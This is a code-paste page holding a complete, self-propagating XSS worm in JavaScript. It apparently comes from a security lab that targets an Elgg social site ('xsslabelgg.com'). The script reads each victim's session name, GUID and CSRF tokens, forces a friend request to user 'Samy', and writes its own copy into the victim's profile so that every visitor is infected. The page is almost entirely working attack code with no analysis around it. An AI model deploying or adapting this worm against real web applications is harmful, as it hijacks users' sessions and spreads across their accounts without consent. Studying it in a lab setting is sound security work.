Untitled

mail@pastecode.io avatar
unknown
javascript
a year ago
1.8 kB
2
Indexable
Never
<script id=worm>
window.onload = function(){
    var headerTag = "<script id=\"worm\" type=\"text/javascript\">";
    var jsCode = document.getElementById("worm").innerHTML;
    var tailTag = "</" + "script>";
    
    var descriptionContent = "Your're Hacked!!!" + encodeURIComponent(headerTag + jsCode + tailTag); 

    //JavaScript code to access user name, user guid, Time Stamp __elgg_ts
    //and Security Token __elgg_token
    var userName="&name="+elgg.session.user.name;
    var guid="&guid="+elgg.session.user.guid;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;

    //Construct the HTTP request to add Samy as a friend.
    var addFriendURL="http://www.xsslabelgg.com/action/friends/add?friend=47" + ts + token;

    var description="&description=" + descriptionContent;

    //Construct the content of your url.
    var content=token + ts + userName + description + guid;

    var samyGuid=47;

    var editProfileURL = "http://www.xsslabelgg.com/action/profile/edit";
    

    if(elgg.session.user.guid!=samyGuid)
    {
        var Ajax=null;

        //Create and send Ajax request to add friend
        Ajax=new XMLHttpRequest();
        Ajax.open("GET",addFriendURL,true);
        Ajax.setRequestHeader("Host","www.xsslabelgg.com");
        Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        Ajax.send();
        
        //Create and send Ajax request to modify profile
        Ajax=new XMLHttpRequest();
        Ajax.open("POST",editProfileURL,true);
        Ajax.setRequestHeader("Host","www.xsslabelgg.com");
        Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        Ajax.send(content);
    }
}
</script>